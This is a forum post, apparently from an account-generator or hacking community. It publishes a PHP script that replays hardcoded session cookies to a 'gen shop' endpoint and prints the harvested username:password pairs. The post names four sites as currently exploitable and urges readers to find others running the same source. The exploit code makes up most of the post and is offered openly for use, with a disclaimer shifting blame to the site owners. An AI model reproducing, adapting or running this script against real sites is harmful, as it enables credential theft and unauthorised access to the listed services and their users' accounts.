Hey guys so I have been contacting multiple gen shop owners of this exploit but they either become very defensive or just ends up trying to make lies. Then they begin to act very rude to me.
Update: after this announcement owner of script gave up and doesn't know how to fix the script lolI was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.
Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here
Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.
The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.<?
if($_GET['auth']=="max"){
$url = '';
$options = array(
'http' => array(
'method' => 'POST',
'header' => "Host:
" .
"User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
"X-Requested-With: XMLHttpRequest
" .
"Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D
",
),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>
Current shops exploitable:premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com
also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.